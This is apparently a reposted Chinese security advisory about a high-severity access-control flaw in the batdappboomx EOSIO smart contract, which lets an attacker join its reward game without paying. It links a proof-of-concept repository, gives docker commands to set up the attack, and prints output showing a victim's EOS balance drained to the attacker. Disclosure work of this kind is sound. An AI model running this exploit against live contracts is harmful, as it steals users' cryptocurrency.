点击上方蓝字“Ots安全”一起玩耍
batdappboomx是运行在EOSIO 区块链中的公共智能合约。如果参与者之前支付了一些加密货币,则该智能合约会向其参与者奖励加密货币。
| # | 漏洞状态 | 描述 |
|---|---|---|
| 1 | 漏洞细节 | 有 |
| 2 | 漏洞类型 | 访问控制 |
| 3 | 漏洞等级 | 高 |
| 4 | 野外利用 | 未知 |
| 5 | EXP | 未知 |
| 6 | POC | 未知 |
-
https://github.com/Kenun99/CVE-batdappboomx
-
无
-
此智能合约的最新版本。智能合约的 sha256 哈希码为 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 在区块链浏览器https://bloks.io/account/batdappboomx中查看。
batdappboomx不是开源的,但我们发现了WASAI的一个漏洞。攻击者无需支付任何费用即可加入此游戏。
激活环境
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomxdocker build -t localhost/client-eos:eos .docker run --rm --network host -it localhost/client-eos:eos
攻击受害者并窃取其加密货币,即EOS
info 2022-03-11T14:28:53.345 keosd wallet_plugin.cpp:38 plugin_initialize ]...warn 2022-03-11T14:28:53.355 keosd wallet.cpp:218 save_wallet_file ] saving wallet to file /root/eosio-wallet/./default.walletCreating wallet: defaultSave password to use in the future to unlock this wallet.Without password imported keys will not be retrievable.saving password to /root/passwdimported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV[+] victim's balance: 100.00 -> 0.00[+] attacker's balance: 10000000.00 10000100.00[+] Attacked successfully. Got more cryptocurrency.
原文始发于微信公众号(Ots安全):【高】batdappboomx 智能合约访问控制漏洞
